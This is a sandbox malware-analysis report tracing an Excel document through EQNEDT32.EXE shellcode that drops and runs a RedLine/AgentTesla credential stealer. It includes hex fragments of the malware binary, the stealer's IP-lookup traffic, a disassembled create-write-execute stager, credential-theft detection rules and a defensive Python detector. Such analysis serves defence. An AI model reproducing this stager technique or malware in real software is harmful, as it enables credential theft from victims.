May 2, 2024 17:39:45.883079052 CEST | 1289 | IN | Data Raw: c9 0f 85 e3 01 00 00 8d 4f a4 89 5f cc e8 60 83 00 00 8d 8f 80 fe ff ff e8 0a 04 00 00 8d b7 64 fe ff ff 8b ce c7 06 3c c9 49 00 e8 88 02 00 00 ff 76 04 e8 bf e8 01 00 59 8d 8f 8c fd ff ff e8 1b 02 00 00 8d 8f 7c fd ff ff e8 23 83 00 00 8d 8f 6c
                                        Data Ascii: O_`d<IvY|#l)\DItvL@IY9TPTX<@IY9D@D.,@IY9404
May 2, 2024 17:39:45.883085966 CEST | 1289 | IN | Data Raw: 0c 01 00 00 00 8b 43 08 80 7b 0d 00 5f 5e 5b 75 0d c6 40 10 00 5d c2 08 00 8b 7f 38 eb d2 8b 40 38 eb ee 33 c0 c7 05 80 18 4d 00 64 00 00 00 33 c9 66 a3 32 15 4d 00 41 a2 34 15 4d 00 6a 0a 89 0d 38 15 4d 00 89 0d 3c 15 4d 00 89 0d 40 15 4d 00 a2
                                        Data Ascii: C{_^[u@]8@83Md3f2MA4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_]UVuWVgFO GFGFGF aPF
May 2, 2024 17:39:45.992738008 CEST | 1289 | IN | Data Raw: 83 78 08 7f 0f 85 33 08 04 00 80 7d ff 00 8d 8e 64 01 00 00 75 1e 80 be 6d 01 00 00 00 8b 8e 68 01 00 00 75 16 8b 49 04 8b 45 0c 41 89 08 5f 5e c9 c2 08 00 e8 de 08 00 00 eb f3 8b 49 30 eb e5 55 8b ec 83 ec 18 83 65 ec 00 8d 45 ec 83 65 f4 00 56
                                        Data Ascii: x3}dumhuIEA_^I0UeEeVEVPuuxMM3M^At)ttH9AxUSVu3WyQ>t(M@
May 2, 2024 17:39:45.992767096 CEST | 1289 | IN | Data Raw: fe ff ff 8b 41 04 6a 7f 59 66 39 48 08 0f 85 bc 05 04 00 8b 45 fc 48 4f 83 bd 6c ff ff ff 00 89 45 fc 0f 84 83 03 04 00 80 bd 75 ff ff ff 00 8b 45 c0 0f 85 7b 03 04 00 8b 18 8d 8d 6c ff ff ff e8 65 03 00 00 8b 85 70 ff ff ff 89 45 c0 8b 45 fc 85
                                        Data Ascii: AjYf9HEHOlEuE{lepEE;&r8EE}TPGZEHXE!#AjYf9HmME@E0u]uEuuSPuW
May 2, 2024 17:39:45.992786884 CEST | 1289 | IN | Data Raw: 7d 0c 00 0f 85 a9 01 04 00 83 7d 10 00 75 34 83 7d 14 00 0f 85 b8 01 04 00 83 7d 18 00 0f 85 b7 01 04 00 83 7d 1c 00 0f 85 b6 01 04 00 83 7d 20 00 75 19 83 7d 24 00 0f 85 7e 01 04 00 33 c0 5d c2 20 00 6a ff 6a 77 e9 73 01 04 00 6a ff 6a 73 e9 6a
                                        Data Ascii: }}u4}}}} u}$~3] jjwsjjsjUVF}^W3jZQL>3YNF~F<BN$;|SA23~,FDMEuNGA;|u[_FMFMLU
May 2, 2024 17:39:45.992806911 CEST | 1289 | IN | Data Raw: 7b 00 00 ff 75 08 8d 4d 90 c7 45 a4 34 cc 49 00 89 5d a8 89 5d ac 89 5d b0 88 5d b4 e8 78 1c 00 00 8b 4d 0c be 18 14 4d 00 8a 45 b4 88 01 8b ce e8 db 0b 00 00 68 9c ca 49 00 8d 4d e0 e8 27 6e 00 00 6a 01 ff 35 18 14 4d 00 8d 4d b8 89 5d c4 89 5d
                                        Data Ascii: {uME4I]]]]xMMEhIM'nj5MM]]]& ]MiVMzEPM@hIMmSjEPEP/yMihtIME]EmSSEPEPxMEciMluM"z
May 2, 2024 17:39:45.992830038 CEST | 1289 | IN | Data Raw: 48 04 eb ee 55 8b ec b8 04 00 01 00 e8 ec eb 03 00 56 8d 45 fc 8b f2 50 8d 85 fc ff fe ff 50 68 ff 7f 00 00 ff 31 ff 15 68 c3 49 00 8b 45 fc 85 c0 74 05 33 c9 66 89 08 8d 8d fc ff fe ff e8 11 00 00 00 8d 85 fc ff fe ff 8b ce 50 e8 b3 37 00 00 5e
                                        Data Ascii: HUVEPPh1hIEt3fP7^VVYtf|F\u3fLF^UVW3FO;Qu_^]USVWueYN3C;FPiq?PFuCP~3N_fH
May 2, 2024 17:39:45.992855072 CEST | 1289 | IN | Data Raw: 50 e8 de ea 01 00 83 c4 0c 39 9e 98 01 00 00 75 0b a1 e4 13 4d 00 89 86 98 01 00 00 39 9e a4 01 00 00 75 11 a1 e8 13 4d 00 89 86 a4 01 00 00 89 86 a8 01 00 00 39 9e b0 01 00 00 75 0b a1 ec 13 4d 00 89 86 b0 01 00 00 8d 9e a0 01 00 00 53 8d be 9c
                                        Data Ascii: P9uM9uM9uMSW[Md$$D$F@D$D$D$ qD$$=hMD$PjIhM_^[]U=hMVhL$#)=
May 2, 2024 17:39:45.992876053 CEST | 1289 | IN | Data Raw: 89 5f 08 89 5f 0c 89 5f 10 89 5f 14 89 5f 4c 66 89 1f e8 64 2a 00 00 8d 4f 28 e8 7a da ff ff 39 5f 58 0f 87 f6 f6 03 00 8d 4f 50 5f 5b e9 3e da ff ff 50 e8 77 c0 01 00 59 eb b9 55 8b ec 53 8b 5d 08 83 e3 01 f6 45 08 02 56 8b f1 0f 84 e9 f6 03 00
                                        Data Ascii: _____Lfd*O(z9_XOP_[>PwYUS]EVWhA@~7jV&tQWYY_^[]VWj^$MZu MMrZMhZM^ZMTZMJZM@Z_M^4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49162 | 104.26.12.205 | 443 | 1128 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-02 15:39:49 UTC | 155 | OUT | GET / HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                        Host: api.ipify.org
                                        Connection: Keep-Alive
2024-05-02 15:39:49 UTC | 211 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 02 May 2024 15:39:49 GMT
                                        Content-Type: text/plain
                                        Content-Length: 14
                                        Connection: close
                                        Vary: Origin
                                        CF-Cache-Status: DYNAMIC
                                        Server: cloudflare
                                        CF-RAY: 87d91b305e0a0fa9-EWR
2024-05-02 15:39:49 UTC | 14 | IN | Data Raw: 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35
                                        Data Ascii: 191.96.150.225

                                        Target ID:0
                                        Start time:17:38:55
                                        Start date:02/05/2024
                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                        Imagebase:0x13f650000
                                        File size:28'253'536 bytes
                                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:2
                                        Start time:17:39:44
                                        Start date:02/05/2024
                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                        Imagebase:0x400000
                                        File size:543'304 bytes
                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:17:39:45
                                        Start date:02/05/2024
                                        Path:C:\Users\user\AppData\Roaming\CKK.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\CKK.exe"
                                        Imagebase:0xff330000
                                        File size:1'219'072 bytes
                                        MD5 hash:6DBF70053A37B13C106C623E0934DDFF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.447488825.0000000000140000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000002.447488825.0000000000140000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 39%, ReversingLabs
                                        • Detection: 40%, Virustotal, Browse
                                        Reputation:low
                                        Has exited:true

                                        Target ID:4
                                        Start time:17:39:46
                                        Start date:02/05/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\CKK.exe"
                                        Imagebase:0xec0000
                                        File size:45'248 bytes
                                        MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.608358959.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000004.00000002.608358959.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.608494898.0000000002493000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Has exited:false

                                          Execution Graph

                                          Execution Coverage: 10.4%
                                          Dynamic/Decrypted Code Coverage: 0%
                                          Signature Coverage: 82.8%
                                          Total number of Nodes: 705
                                          Total number of Limit Nodes: 70

                                          Callgraph

                                          • Executed
                                          • Not Executed
                                          • Opacity -> Relevance
                                          • Disassembly available

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          APIs
                                            • Part of subcall function 035904E8: WriteFile.KERNELBASE(0359043C,03590453,00000000,00000000,00000000,?,03590453,0359043C,00000000,00000000,00000000,00000000,035903F5,00000050,00000000), ref: 0359054B
                                          • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,03590592,?,03590570), ref: 035905CA
                                          • ExitProcess.KERNELBASE(00000000,?,035905D1,?,03590592,?,03590570,?,?,03590557,00000000,00000000,00000000,00000000,035903F5,00000050), ref: 035905E2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: Process$CreateExitFileWrite
                                          • String ID:
                                          • API String ID: 3739231918-0
                                          • Opcode ID: ecf8aac7c8f5a532ebe00187704931cd21d5dcfcf7f73e5d55e0df0344cecd4e
                                          • Instruction ID: ab80fd62e361bf13975b4a836761c1b68d510960ee618f0de1cd2fbfb8721254
                                          • Opcode Fuzzy Hash: ecf8aac7c8f5a532ebe00187704931cd21d5dcfcf7f73e5d55e0df0344cecd4e
                                          • Instruction Fuzzy Hash: AA31E7B14083415AEF21EAA4E980AAFFB7DFFC1700F188D4FE192470B2D671D5089661
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          Graph of function 03590502 (basic blocks 03590502 through 0359065A; calls WriteFile, CreateProcessW and ExitProcess). The graph rendering is not reproduced in text; only the block range and API calls are kept.
                                          APIs
                                          • WriteFile.KERNELBASE(0359043C,03590453,00000000,00000000,00000000,?,03590453,0359043C,00000000,00000000,00000000,00000000,035903F5,00000050,00000000), ref: 0359054B
                                          • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,03590592,?,03590570), ref: 035905CA
                                          • ExitProcess.KERNELBASE(00000000,?,035905D1,?,03590592,?,03590570,?,?,03590557,00000000,00000000,00000000,00000000,035903F5,00000050), ref: 035905E2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: Process$CreateExitFileWrite
                                          • String ID:
                                          • API String ID: 3739231918-0
                                          • Opcode ID: d26a8295f2a3bfc1efaa8aa04e95a18b127ffe2b33cb040d0da394256dcd0fb0
                                          • Instruction ID: 0c9e5a90e30d8a9afa5dda6475775e17688e712700aaee73d2ae3b5f8fe2eac6
                                          • Opcode Fuzzy Hash: d26a8295f2a3bfc1efaa8aa04e95a18b127ffe2b33cb040d0da394256dcd0fb0
                                          • Instruction Fuzzy Hash: 8221A6B540C3455AEF11EB64EC80AAFBB69FFC1700F188D4BF192870B1DA7495089766
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          Graph of function 035904E8 (basic blocks 035904E8 through 0359065A; calls WriteFile, CreateProcessW and ExitProcess). The graph rendering is not reproduced in text; only the block range and API calls are kept.
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: Process$CreateExitFileWrite
                                          • String ID:
                                          • API String ID: 3739231918-0
                                          • Opcode ID: ec687970cd5e863647ec71913091ed8e96e7369ce3460fad760adeb2de576102
                                          • Instruction ID: 5b55de56d16d3f77625f288f53082a342a537f7b5e28436e37b017676ccc1085
                                          • Opcode Fuzzy Hash: ec687970cd5e863647ec71913091ed8e96e7369ce3460fad760adeb2de576102
                                          • Instruction Fuzzy Hash: 592188B14083455BEF11EA64DC84FAFF76AFFC1740F188D4EB192470B1DA7595088761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          Graph of function 035902D0 (basic blocks 035902D0 through 0359065A; calls ExitProcess at entry, then CreateFileW, WriteFile, CreateProcessW and ExitProcess). The graph rendering is not reproduced in text; only the block range and API calls are kept.
                                          APIs
                                          • ExitProcess.KERNELBASE(035902BE), ref: 035902D0
                                            • Part of subcall function 035902E9: CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 03590395
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: ea9ceec6a0e7a5b78fbc5f5d5d2948ca6cbcadeb6e9e5a1dbfb5103c10cb95b0
                                          • Instruction ID: 0754cfec5f06aae6eced46fbbe65a2fbd10e2fa03424319cddee2af14c1d54a0
                                          • Opcode Fuzzy Hash: ea9ceec6a0e7a5b78fbc5f5d5d2948ca6cbcadeb6e9e5a1dbfb5103c10cb95b0
                                          • Instruction Fuzzy Hash: F621BF6540D7C05FFB11D7606E9A758BEA0BF4B600F1C8ECB81C58F1F3D2A5A14A9356
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          Graph of function 03590563 (basic blocks 03590563 through 0359065A; calls CreateProcessW and ExitProcess). The graph rendering is not reproduced in text; only the block range and API calls are kept.
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: Process$CreateExit
                                          • String ID:
                                          • API String ID: 126409537-0
                                          • Opcode ID: 8231ee5b18957d3648bc57fc975aece0ec9b201bd18f6de92825622497ed5a63
                                          • Instruction ID: 67b0d33bb42bece405003d4d012b41b4a33391ecde3dba8f93ae024331834435
                                          • Opcode Fuzzy Hash: 8231ee5b18957d3648bc57fc975aece0ec9b201bd18f6de92825622497ed5a63
                                          • Instruction Fuzzy Hash: 1011E7F04083415BEE21E768EC84B9EFB6AFFC1300F188D4BE1824B0B6CA7485548665
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          Graph of function 035905A1 (basic blocks 035905A1 through 0359065A; calls CreateProcessW and ExitProcess). The graph rendering is not reproduced in text; only the block range and API calls are kept.
                                          APIs
                                          • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,03590592,?,03590570), ref: 035905CA
                                            • Part of subcall function 035905DD: ExitProcess.KERNELBASE(00000000,?,035905D1,?,03590592,?,03590570,?,?,03590557,00000000,00000000,00000000,00000000,035903F5,00000050), ref: 035905E2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: Process$CreateExit
                                          • String ID:
                                          • API String ID: 126409537-0
                                          • Opcode ID: cc04445753e1ca6f8d30d3611a3f9dac58b0c92c2cdc5dffd7fbd729de51b4ed
                                          • Instruction ID: d527466024da5529aa178f6fcd764473419ba670f666dc310763819c0bdb06d3
                                          • Opcode Fuzzy Hash: cc04445753e1ca6f8d30d3611a3f9dac58b0c92c2cdc5dffd7fbd729de51b4ed
                                          • Instruction Fuzzy Hash: AF01ACA950424251FFB0E668E8447F6B766FBC1700FCC9C5BA486470F5D76451C3C6E9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          Graph of function 03590580 (basic blocks 03590580 through 0359065A; calls CreateProcessW and ExitProcess). The graph rendering is not reproduced in text; only the block range and API calls are kept.
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: Process$CreateExit
                                          • String ID:
                                          • API String ID: 126409537-0
                                          • Opcode ID: ab6099e50a1536c03818295e56c65e109917f17f6d534d6b5d930f748458d395
                                          • Instruction ID: 669c1078489991c14b67652fddc60cdde03050fad4635b2da2257d4e2ac6fc77
                                          • Opcode Fuzzy Hash: ab6099e50a1536c03818295e56c65e109917f17f6d534d6b5d930f748458d395
                                          • Instruction Fuzzy Hash: B601A2F64083416AEF11E7A8EC84FABB76DFFC0300F488C4BA1568B0B1DA74955586A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          Graph of function 03590259 (basic blocks 0359024B through 0359065A; calls CreateFileW, LoadLibraryW through subcall 035903AF, WriteFile, CreateProcessW and ExitProcess). The graph rendering is not reproduced in text; only the block range and API calls are kept.
                                          APIs
                                          • CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 03590395
                                            • Part of subcall function 035903AF: LoadLibraryW.KERNEL32(0359039F), ref: 035903AF
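Read together, the argument lists in these entries spell out the stager: CreateFileW at 03590395 is called with dwDesiredAccess C0000000 (GENERIC_READ | GENERIC_WRITE) and dwCreationDisposition 00000002 (CREATE_ALWAYS), LoadLibraryW at 035903AF is reached on the same path, WriteFile at 0359054B fills the new file, CreateProcessW at 035905CA launches it and ExitProcess at 035905E2 ends EQNEDT32.EXE. As an added example, not part of the Joe Sandbox report, the Python below parses these "APIs" lines in the format the report prints them, decodes the CreateFileW arguments with the documented Win32 constant values, and checks for the create-write-execute chain. Ordering calls by their ref address is an assumption; it matches the call order the control-flow graphs on this page show. The sample input is copied from the lines above.

```python
import re

# Constructed sample input: the "APIs" lines copied from this report's
# disassembly entries for the shellcode mapped at 0x03590000 in EQNEDT32.EXE.
SAMPLE_API_LINES = """
• CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 03590395
  • Part of subcall function 035903AF: LoadLibraryW.KERNEL32(0359039F), ref: 035903AF
• WriteFile.KERNELBASE(0359043C,03590453,00000000,00000000,00000000,?,03590453,0359043C,00000000,00000000,00000000,00000000,035903F5,00000050,00000000), ref: 0359054B
• CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,03590592,?,03590570), ref: 035905CA
• ExitProcess.KERNELBASE(00000000,?,035905D1,?,03590592,?,03590570,?,?,03590557,00000000,00000000,00000000,00000000,035903F5,00000050), ref: 035905E2
"""

# One call per line: "<Api>.<Module>(<args>), ref: <8 hex digits>"
API_RE = re.compile(r"(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]{8})")

# Documented Win32 constants for the CreateFileW arguments inspected below.
GENERIC_ACCESS = {
    0x80000000: "GENERIC_READ",
    0x40000000: "GENERIC_WRITE",
    0x20000000: "GENERIC_EXECUTE",
    0x10000000: "GENERIC_ALL",
}
CREATION_DISPOSITION = {
    1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
    4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING",
}


def parse_api_lines(text):
    """Parse report 'APIs' lines into call records, de-duplicated by call site
    and ordered by ref address (assumption: on this page that order matches the
    call order shown by the control-flow graphs)."""
    calls, seen = [], set()
    for line in text.splitlines():
        m = API_RE.search(line)
        if not m:
            continue
        api, module, argstr, ref = m.groups()
        if (api, ref) in seen:
            continue
        seen.add((api, ref))
        args = [a.strip() for a in argstr.split(",")] if argstr else []
        calls.append({"api": api, "module": module, "args": args, "ref": int(ref, 16)})
    calls.sort(key=lambda c: c["ref"])
    return calls


def hexarg(arg):
    """Integer value of a resolved argument; None for '?' (unresolved by the plugin)."""
    return None if arg == "?" else int(arg, 16)


def describe_createfile(call):
    """Decode dwDesiredAccess (arg 1) and dwCreationDisposition (arg 4) of CreateFileW."""
    access = hexarg(call["args"][1])
    disposition = hexarg(call["args"][4])
    names = [n for bit, n in GENERIC_ACCESS.items() if access is not None and access & bit]
    return {"access": names,
            "disposition": CREATION_DISPOSITION.get(disposition, str(disposition))}


def drop_and_execute_chain(calls):
    """True when the ordered calls show a file created for writing with
    CREATE_ALWAYS, then WriteFile, then CreateProcessW: the drop-and-execute
    stager this report's shellcode implements."""
    order = [c["api"] for c in calls]
    try:
        i_create = order.index("CreateFileW")
        i_write = order.index("WriteFile", i_create)
        order.index("CreateProcessW", i_write)
    except ValueError:
        return False
    cf = describe_createfile(calls[i_create])
    return "GENERIC_WRITE" in cf["access"] and cf["disposition"] == "CREATE_ALWAYS"


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_API_LINES)
    for c in parsed:
        print(f"{c['ref']:08X} {c['module']}!{c['api']}({', '.join(c['args'])})")
    print("drop-and-execute chain:", drop_and_execute_chain(parsed))
```

The check is deliberately order-sensitive: a WriteFile that precedes the CreateFileW, or a CreateFileW opened with OPEN_EXISTING and no write access, does not match, which keeps it from firing on ordinary file reads that the same plugin output would also list.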
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateFileLibraryLoad
                                          • String ID:
                                          • API String ID: 2049390123-0
                                          • Opcode ID: 08466a33bc151eb96c27a536a204423fdb2a401b39198ad3b6eb24cd9949cb52
                                          • Instruction ID: ef1eb81cd9c44ee9852d60c1dcad67df0a5e5ad3d23e0f0e0b5ef8022f4334ef
                                          • Opcode Fuzzy Hash: 08466a33bc151eb96c27a536a204423fdb2a401b39198ad3b6eb24cd9949cb52
                                          • Instruction Fuzzy Hash: 4641126140D7C15FEB12CB346D6A694BF64BF5B600B1C8ACBC1C44F1F3D265A14AD362
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          Graph of function 035900AB (basic blocks 03590090 through 0359065A; calls CreateFileW, WriteFile, CreateProcessW and ExitProcess). The graph rendering is not reproduced in text; only the block range and API calls are kept.
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 6d6de990fe797286e064a2f262e62d974b589ff7f4d75b2c019d389a6ebc00bc
                                          • Instruction ID: 53ed08e6f5f21d0066e3ae65cb43b4db9947ab33ed8c5e516541e2156424e4ef
                                          • Opcode Fuzzy Hash: 6d6de990fe797286e064a2f262e62d974b589ff7f4d75b2c019d389a6ebc00bc
                                          • Instruction Fuzzy Hash: C041CC6140C3C08FFF11D6207E9A665BFA4BB07600F4E8EDB85824F0F3D294924AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          Graph of function 035900EB (basic blocks 03590090 through 0359065A; calls CreateFileW, WriteFile, CreateProcessW and ExitProcess). The graph rendering is not reproduced in text; only the block range and API calls are kept.
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: f9eefd21bbc794892dd33f7cc53fed70693d3882f9914b97490317e015f93b55
                                          • Instruction ID: 1c84b6f3fe24e5d33b0d04ad9ed7a22ea466d577fef8ab85edc9f52ba9bcd751
                                          • Opcode Fuzzy Hash: f9eefd21bbc794892dd33f7cc53fed70693d3882f9914b97490317e015f93b55
                                          • Instruction Fuzzy Hash: 7B41CD6580D3C08FFF12D6607E9A665BF64BB07600F5E8EDB85824F0F3D294924AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
